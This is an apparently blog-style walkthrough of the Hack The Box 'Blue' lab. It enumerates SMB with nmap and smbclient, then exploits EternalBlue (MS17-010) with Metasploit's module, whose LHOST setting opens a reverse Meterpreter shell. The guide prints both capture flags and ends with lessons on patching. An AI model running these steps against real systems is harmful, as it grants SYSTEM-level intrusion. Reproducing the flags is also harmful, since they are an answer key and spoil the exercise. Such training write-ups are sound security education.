Room URL: https://chatgpt.com/c/6752cad6-b0d4-8002-ace9-5d13e373910f
Blue, one of the most beginner-friendly machines on Hack The Box, offers a critical lesson about the dangers of unpatched vulnerabilities. This machine focuses on the infamous EternalBlue exploit (MS17–010), which was leaked publicly and exploited in major ransomware and crypto-mining campaigns such as WannaCry and NotPetya. While simple in execution, Blue highlights how devastating vulnerabilities can be if left unaddressed.
This guide provides an in-depth walkthrough of the Blue challenge, aimed at beginners who are eager to sharpen their penetration testing skills while gaining a practical understanding of EternalBlue.
Why Blue Matters
Despite being classified as an “easy” machine, Blue delivers significant insights into:
- The dangers of unpatched systems in a production environment.
- Real-world exploitation of a publicly known vulnerability.
- The importance of timely patching and proactive vulnerability management.
By completing this challenge, you’ll gain:
- Practical skills in identifying and exploiting vulnerable Windows SMB services.
2. A deeper appreciation for cybersecurity best practices.
What You’ll Learn
By working through this machine, you’ll develop:
- The ability to identify vulnerable Windows SMB services using enumeration techniques.
- Experience in exploiting EternalBlue through automated tools like Metasploit or a manual Python exploit.
- An understanding of how proper patch management can prevent large-scale cyberattacks.
Prerequisites
To successfully complete this challenge, you’ll need:
- Basic Knowledge: Familiarity with Windows systems, port scanning, and network enumeration.
- Tools Installed: Tools like Nmap, Metasploit, and Python on your attack machine.
- A Working Network Connection: Ensure you can reach the target over the Hack The Box VPN.
Check Network Connectivity
Before scanning, confirm connectivity to the target using the ping command:
The ping command sends ICMP (Internet Control Message Protocol) Echo Request packets to a specified host and waits for Echo Reply packets to confirm that the host is reachable. It’s one of the simplest and most commonly used tools for troubleshooting network connectivity.
ping -c4 <Target_IP>
ping -c4 10.10.10.40ping: This is the command itself, used to test connectivity by sending packets to the target.
-c4: This option specifies the number of ICMP packets to send. In this case, 4 packets will be sent.
Without this flag, ping would continue sending packets indefinitely until stopped manually (with Ctrl+C).
<Target_IP>: Replace this placeholder with the actual IP address or hostname of the target machine.
If the target is reachable, you’ll see responses. If it’s unreachable, ensure your VPN is properly configured.
Task 1: How Many Open TCP Ports Are Listening on Blue?
Your first task is to determine the number of open TCP ports on the Blue machine. Avoid counting any 5-digit ports (ports greater than 9999).
Scanning the Target with Nmap
To identify open ports and services, run the following nmap command:
nmap -sC -sV -p- <Target_IP>
nmap -sC -sV -p- 10.10.10.40-sC (Default Script Scan): This option tells Nmap to run a predefined set of scripts from the Nmap Scripting Engine (NSE). These scripts are designed to gather additional information about the target, such as:
Checking for vulnerabilities.
Retrieving software versions.
Performing brute force login attempts (if enabled).
-sV (Service Version Detection): This enables service version detection to determine which application and version is running on each open port.
This is essential for identifying potential vulnerabilities in outdated software versions.
-p- (Scan All Ports): By default, Nmap scans the most common 1,000 ports unless otherwise specified. The -p- option tells Nmap to scan all 65,535 TCP ports, from port 1 to port 65535.
This is useful because some services might run on non-standard ports, especially in custom or hardened configurations.
<Target_IP>: This tells Nmap the target of the scan.
Replace <Target_IP> with the IP address of the machine you want to scan (10.10.10.40).
Key Findings from the Nmap Scan
- Host Status: Host is up: The target machine is online and reachable, with a latency of 0.13 seconds.
2. Open TCP Ports: A total of 9 open ports were detected:
135/tcp: Microsoft Windows RPC.
139/tcp: NetBIOS session service.
445/tcp: Microsoft Directory Services (SMB).
49152–49157/tcp: MSRPC (Microsoft Remote Procedure Call) dynamic ports.
3. Service Information: The target is running Windows 7 Professional SP1.
The NetBIOS computer name is HARIS-PC, and it belongs to the WORKGROUP workgroup.
4. Host Script Results:
SMB OS Discovery: The operating system is accurately identified as Windows 7 Professional SP1.
The system time indicates the host is set to 2024–12–06T10:52:33+00:00.
SMB Security Mode: Authentication level: User.
Message signing: Disabled (default but considered insecure).
SMB2 Security Mode: Message signing is enabled but not required.
Clock Skew: The clock skew between your machine and the target is approximately 1 second, which is negligible.
Analysis of Open Ports
The open ports suggest that this machine is configured as a standard Windows 7 system with some additional services enabled:
- Critical Ports for Exploitation:
445/tcp: This is the SMB (Server Message Block) port, which is the primary target for the EternalBlue (MS17–010) exploit.
139/tcp: Often used alongside SMB for older NetBIOS protocols, but modern attacks usually focus on port 445.
2. Dynamic MSRPC Ports (49152–49157):
These are dynamically allocated ports for Microsoft Remote Procedure Call services.
While these may not be directly exploitable, they indicate the presence of RPC services, which can be probed further if necessary.
What This Means for Your Task
How Many TCP Ports are Listening?
From the output, we can see 9 open ports, but if we exclude 5-digit ports (ports 49152 through 49157), there are 3 remaining open ports:
135
139
445
Answer: 3 TCP ports (excluding 5-digit ports).
Task 2: What is the hostname of Blue?
From the Nmap scan results, the hostname of the target machine (Blue) is revealed in the SMB OS Discovery section.
Answer: HARIS-PC
Task 3: What operating system is running on the target machine? Give a two-word answer with a name and high-level version.
Answer: Windows 7
Task 4: How many SMB shares are available on Blue?
SMB Shares are networked resources shared using the Server Message Block (SMB) protocol. SMB is a file-sharing protocol commonly used on Windows networks to allow users and applications to access files, directories, printers, and other resources over a network as if they were local to their computer.
To determine how many SMB shares are available on the Blue machine, you can use tools like smbclient or Nmap with the appropriate scripts.
nmap --script smb-enum-shares -p 445 <Target_IP>
nmap --script smb-enum-shares -p 445 10.10.10.40— script smb-enum-shares: This specifies that Nmap should run the SMB enumeration script (smb-enum-shares) from its Nmap Scripting Engine (NSE).
The script connects to the SMB service on the target machine and attempts to enumerate all available shares.
Shares can include both:
Default shares: ADMIN$, C$, IPC$.
Custom shares: public or user-created shares.
-p 445: This limits the scan to port 445, the default port for the SMB service on modern Windows systems.
<Target_IP>: Replace <Target_IP> with the IP address of the target machine to specify which system Nmap should scan.
From the Nmap results, we can see the SMB shares available on the target machine (Blue) along with their access levels. Here’s a breakdown:
Identified SMB Shares
1. ADMIN$:
Type: Hidden administrative share.
Comment: Remote Admin.
Access: No access for anonymous or current user.
2. C$:
Type: Hidden administrative share.
Comment: Default share.
Access: No access for anonymous or current user.
3. IPC$:
Type: Hidden inter-process communication share.
Comment: Remote IPC.
Access:
Anonymous: Read access.
Current user: Read/Write access.
4. Share:
Type: Standard shared directory.
Comment: (No comment provided).
Access:
Anonymous: No access.
Current user: Read access.
5. Users:
Type: Standard shared directory.
Comment: (No comment provided).
Access:
Anonymous: No access.
Current user: Read access.
Alternatively, use the smbclient tool to list shares:
smbclient is a command-line tool that allows users to interact with SMB (Server Message Block)/CIFS (Common Internet File System) servers. It is essentially the Unix/Linux equivalent of a Windows file-sharing client. With smbclient, you can access shared files and directories on remote servers that use the SMB protocol.
smbclient -L //<Target_IP> -N
smbclient -L //10.10.10.40 -Nsmbclient: smbclient is a command-line tool for interacting with SMB/CIFS shares on remote servers.
It can be used to list shares, connect to them, upload/download files, and more.
-L: The -L option tells smbclient to list the available shares on the specified target machine.
It queries the server for all shared resources that the user (in this case, anonymous) has permission to see.
//<Target_IP>: Replace <Target_IP> with the IP address or hostname of the target machine you want to scan for SMB shares.
-N: The -N option specifies that no password should be used for authentication.
This effectively attempts an anonymous login, which is common in misconfigured or poorly secured SMB setups.
Answer: 5 SMB shares listed:
- ADMIN$
- C$
- IPC$
- Share
- Users
Task 5: What 2017 Microsoft Security Bulletin number describes a remote code execution vulnerability in SMB?
To find the 2017 Microsoft Security Bulletin that describes a remote code execution vulnerability in SMB use the Internet Search
Answer: MS17–010
Vulnerability: MS17–010 is the security bulletin addressing vulnerabilities in the Server Message Block (SMB) protocol, specifically in SMBv1.
Exploit Name: This vulnerability is commonly associated with the exploit known as EternalBlue.
Impact: It allows remote code execution (RCE), enabling an attacker to execute arbitrary code on a vulnerable machine.
Affected Systems:
Windows Vista
Windows 7
Windows 8.1
Windows Server 2008/2012/2016
Older unsupported systems like Windows XP.
Significance
Exploited by Malware: The vulnerability was widely exploited by ransomware such as WannaCry and NotPetya.
These attacks caused massive global disruptions by encrypting files and demanding payment.
Patch Release: Microsoft released a patch for this vulnerability in March 2017 to address the issue. Systems that were not updated remained vulnerable.
For additional details, refer to the official Microsoft Security Bulletin:
MS17–010: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Task 6: Optional question: A worm was set loose on the internet in May 2017 propagating primarily through MS17–010. What is the famous name for that malware?
To find the answer to the question about the malware that propagated through MS17–010 in May 2017 use the Internet Search
MS17-010 malware May 2017
The famous malware that propagated primarily through the MS17–010 vulnerability in May 2017 is:
- Name: WannaCry (also styled as WannaCrypt, WannaCryptor, or Wana Decrypt0r).
- Type: Ransomware.
- Method of Propagation: Exploited the EternalBlue exploit, which targeted the SMBv1 protocol vulnerability (MS17–010).
Spread as a worm, allowing it to propagate automatically across vulnerable systems within a network.
4. Impact:It encrypted files on infected machines and demanded payment in Bitcoin to decrypt them.
Caused global disruptions, affecting organizations like hospitals, businesses, and government agencies.
Significance
WannaCry was one of the most devastating ransomware attacks ever, infecting hundreds of thousands of systems across over 150 countries in just a few days.
It highlighted the importance of timely system patching, as a fix for MS17–010 had been released two months before the attack.
Additional Notes
Tool Used: WannaCry leveraged the EternalBlue exploit, which was part of a set of hacking tools leaked from the NSA by a group called the Shadow Brokers.
Prevention: Systems patched with the update for MS17–010 were immune to the attack.
Answer: WannaCry
Task 7: What user do you get execution with when exploiting MS17–010? Include the full name, including anything before a .
To find the answer to the user context you gain when exploiting MS17–010, use tool like Metasploit or a manual script (Python-based EternalBlue exploit) to exploit the target system.
Using Metasploit:
- Launch Metasploit:
msfconsole -q2. Search for ms17_010
search ms17_0103. Load the EternalBlue module:
use exploit/windows/smb/ms17_010_eternalblue4. Set the target IP and your local IP:
set RHOSTS <Target_IP>
set LHOST <Your_Attack_Machine_IP>
set RHOSTS 10.10.10.40
set LHOST 10.10.14.75. Run the exploit:
runOnce you gain a session, use the whoami command to shows the current user:
getuidAnswer: NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM: This is the highest privilege account on a Windows system, often referred to as the “system account.”
It has more privileges than an administrator and is used by the operating system to execute processes.
The EternalBlue exploit allows for remote code execution (RCE) in the context of the SMB service.
Since the SMB service runs under the NT AUTHORITY\SYSTEM account, the exploit inherits these privileges.
Submit the flag located on the haris user’s desktop.
- Open a Windows command shell via Meterpreter
shell2. List Users on the System
dir C:\Users3. Change to the user haris Desktop directory:
cd C:\Users\haris\Desktop4. List the contents of the Desktop directory:
dir5. Read the user.txt file:
type user.txtFlag: 0c4f3a9386dba985686ce78e58237c6d
Submit the flag located on the administrator’s desktop.
- Change to the user administrator Desktop directory:
cd C:\Users\administrator\Desktop2. List the contents of the Desktop directory:
dir3. Read the root.txt file:
type root.txtFlag: b6b9cccdf6904e9ffdb0110122a50a43
Lessons Learned
The completion of the Blue (MS17–010) Hack The Box challenge provided key insights and practical skills related to cybersecurity and system exploitation like:
1. Importance of Patching
Keeping systems up-to-date with critical patches is essential to prevent exploitation of known vulnerabilities. The infamous WannaCry ransomware attack demonstrated the catastrophic consequences of unpatched systems.
2. SMB Risks
SMB misconfigurations and vulnerabilities (e.g., SMBv1) are common attack vectors. Disabling legacy protocols and regularly auditing SMB shares are crucial steps to secure systems.
3. Hands-On Skills
Tools like Metasploit, Nmap, and SMBClient are invaluable for enumeration and exploitation. Practical experience with these tools improves the understanding of how attackers operate.
4. Privilege Escalation
Exploiting MS17–010 grants high-level privileges (NT AUTHORITY\SYSTEM), emphasizing the need for layered security and privilege monitoring.
5. Enumeration is Critical
Proper reconnaissance (e.g., identifying SMB shares and open ports) is foundational to successful exploitation and understanding system weaknesses.
6. Real-World Relevance
The EternalBlue exploit shows how real-world vulnerabilities and leaks (Shadow Brokers’ NSA toolkit) can lead to large-scale attacks like WannaCry and NotPetya.
7. System Hardening
Secure configurations, disabling SMBv1, and enforcing strong access controls reduce the attack surface significantly.
8. Incident Response
Understanding vulnerabilities like EternalBlue provides valuable insights into detecting, preventing, and responding to attacks effectively.
Skills Gained
Enumeration: Identifying weak points using tools like Nmap and smbclient.
Exploitation: Understanding how EternalBlue works and using it to gain access.
Privilege Escalation: Working with elevated privileges.
Post-Exploitation: Extracting sensitive information and understanding the impact.
Final Takeaway
Blue may be a beginner-level challenge, but it emphasizes the real-world implications of unpatched systems and misconfigurations. It provides practical experience and highlights the importance of proactive security measures, making it a valuable learning experience for both offensive and defensive cybersecurity professionals.
